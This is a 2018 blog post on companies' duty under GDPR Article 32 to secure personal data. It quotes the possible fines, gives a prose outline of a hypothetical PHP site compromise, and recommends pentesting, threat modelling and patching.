A scan of the property “sitewards.com” via NMAP.

On the obligation under GPDR to handle data “safely”

Andrew Howden
Y1 Digital
Published in
7 min readJun 17, 2018

--

With the introduction of the GDPR (or “General Data Protection Regulation”) across the EU companies are under an increased burden to demonstrate they are handling personal data in a safe and secure manner. The GDPR defines two roles for data handling:

  • Controller, who is responsible for obtaining the data lawfully
  • Processor, who his responsible for processes the data on behalf of the controller.

All companies who handle data at least a processor, and maybe a controller. Both are responsible for the safety of this data. Specifically, the GDPR says the following:

Taking into account the state of the art, the costs of implementation and the nature, scope, context and purposes of processing as well as the risk of varying likelihood and severity for the rights and freedoms of natural persons, the controller and the processor shall implement appropriate technical and organisational measures to ensure a level of security appropriate to the risk. — GDPR, Article 32

In addition, it lays out penalties for violating the above condition:

Infringements of the following provisions shall, in accordance with paragraph 2, be subject to administrative fines up to 10 000 000 EUR, or in the case of an undertaking, up to 2 % of the total worldwide annual turnover of the preceding financial year, whichever is higher:

the obligations of the controller and the processor pursuant to Articles 8, 11, 25 to 39 and 42 and 43 GDPR, Article 82

Given this, we can allocate some monetary value to violating the above standards. In addition, we can assign a cost to data breach even prior to the implementation of the new fines applicable under the GDPR thanks to IBMs cost of data breach report:

This year’s study reports the global average cost of a data breach is down 10 percent over previous years to $3.62 million. The average cost for each lost or stolen record containing sensitive and confidential information also significantly decreased from $158 in 2016 to $141 in this year’s study.

So, given some back of the envelope maths we can determine that a data breach is expected to cost somewhere between 3 and 13 million USD, depending on the severity of the breach, the cost of litigation etc.

Anatomy of a hack

To understand the risk offset we need to first examine what we are protecting against and determine in what ways we can make it more difficult to use our services in an unauthorised way.

To do this, we’ll quickly review how a potential hacker can probe and exploit an environment.

Discovery

In any structured attack the first step to determine how to exploit a service is to understand what a service is. There are many tools that automate this process, making it fairly easy for a semi-skilled attacker to get a good understanding of what a service can provide.

Let’s pretend our hacker has visited our site, and looked at the HTTP headers for the PHP X-Powered-By header. Understanding that this is a PHP website and being knowledgable about the class of exploits common to PHP, the hacker starts looking for command injection through the PHP mail function. The hacker sees a contact form, which in most system simply forwards requests via email to a given user.

Exploitation

Unfortunately, our pretend application is running the PHP library “PHPMailer”. This popular library is used to send email to users for all osrts of reasons, but includes a vulnerability that allows the hacker to execute code on the system.

The hacker then attempts to use this publicly available exploit against the system, and to their delight it works — the hacker is able to issue arbitrary instructions in a limited way to the service.

Persistence

Though our hacker is now able to make the machine do something akin to what they want, it is a limited window with which to further investigate and exploit the system. It is possible that a knowledgeable developer closes this hole in the next patch cycle, or that the execution of these commands are detected by software designed to catch this type of exploitation.

Accordingly, the hacker needs to establish persistence. Our hacker is likely to issue the instruction through the previous vulnerability to connect back to a service that the hacker controls to allow further access to the machine in a much simpler way (or, “reverse shell”).

Once this access has been established, the hacker will begin looking around for a way to escalate privileges and establish persistence. Our hacker has been keeping a close eye on the CVE feeds and knows there is a kernel exploit called “dirty c0w” which reliably allows escalation to administrative privileges on the machine.

Our hacker transfers this exploit to the machine, and runs it — gaining administrative privileges. They they install a modified version of the ssh daemon that allows them persistent, unlogged access and modify the system to hide other traces of their presence.

Monetisation

Finally, now that our hacker has a persistent foothold on our network they will begin to look for ways to monetise the information they are able to retrieve. There are many ways to do this;

  • Sell stolen records of personal data
  • Encrypt the data, and ransom back the keys to the business owners
  • Sell intellectual property found on this machine to competing services
  • Install additional software on this machine that makes it part of a “bot net” used to conduct further attacks

A level of security appropriate to the risk

In the above case, this would be a total compromise and we would be required to report the breach both to the supervisory authorities under the GDPR and directly to users themselves. Users would then be able to sue for damages that their private information has been accessed without their consent. The authority that is responsible for information privacy would also likely issue some fines against us as we were unable to meet our duty of care and safely protect user data.

However, there are many things that we can do to dramatically reduce the risk of the above exposure. It is not a simple task to gain unauthorised access to services, and we can make gaining this access an extremely expensive undertaking. Unfortunately there are few ways to “guarantee” that a system is safe, but we can make it cost prohibitive such that attackers will not invest the time and resources required to gain this level of access.

Risk Analysis by direct testing

The best way to determine where to invest our cash is to have someone attempt to break into our services on our behalf. This service, called “pentesting” or “red teaming” contracts professional (but friendly) hackers to break into our service but detail the mechanisms they used to discover and break into the service, and provide recommendations as to how these issues can be resolved. These people can be contracted directly through pentesting companies, or crowd sourced through things like bug bounty programs.

A lower cost alternative is to use software to automate some of the analysis of systems that humans would otherwise perform. This is much cheaper, but sees only a limited slice of the problem as configured by the software implementer. Because hacking is an inherently creative process, software can capture a number of the more obvious faults but is not a suitable replacement for a human operator.

Risk analysis by threat modelling

Unfortunately the services provided can be cost prohibitive and are inherently point in time — new vulnerabilities will be introduced and others closed up as we continue to revise our software.

Instead, it is perhaps better to analyse how other companies have suffered similar issues and begin to examine whether our software suffers from similar classes of issues.

There are a number of mechanisms to help profile our software against the software of others, but perhaps the simplest is to go and look for public “incident response” reports where companies have been hacked but users were then later tasked with investigating the causes of this hack, and how those risks can be reduced.

In many cases there are common themes that run through breached companies, such as:

  • Poor access management controls
  • Unpatched or legacy software
  • No tooling to catch and remediate unauthorised use
  • No procedure for reporting vulnerabilities

Because these patterns are so common there are standards that are designed to provide some guidance as to the most common risks, and how to reduce them. Some examples include:

Implementing these standards directly or using them as a base from which to model the security of our applications may be one way to reduce the level of investigatory work required to evaluate risks.

Risks mitigated

By undertaking the above analysis prior to the hack, we would have been able to heavily mitigate our hackers ability to access our systems. Specifically we would be:

  • Denying them the first access by requiring PHPMailer was up to date
  • Catching them by alerting when the expected behaviour of the application was violated.
  • Preventing them gaining administrative privileges by requiring the operating system was up to date
  • Catching the persistence attempts by detecting unusual system behaviour.

Thus preventing the unauthorised access to data and ability to monetise the access.

In Conclusion

The GDPR introduces new requirements around the unauthorised access of personal data. These requirements will increase both the cost and consequences of a hack, and may result in fines being levied directly against the organisation.

Unfortunately, there is no guarantee of data safety. However, we can take a measured approach to evaluating the risks to our business against the costs to re-mediate certain issues and proactively reduce our exposure to both these fines and consumer action.

Additional Reading

If this topic aroused your interest and you’d like to look into this further, please see the following documentation:

Thanks

  • Both the team at Sitewards and their clients, who’s conversations inspired this post.
  • Daniel Fahlke, Aarion Bonner and Francis M. Gallagher for early review and feedback.
  • Anton Siniorg, who’s discussion prompted further thought.

--

--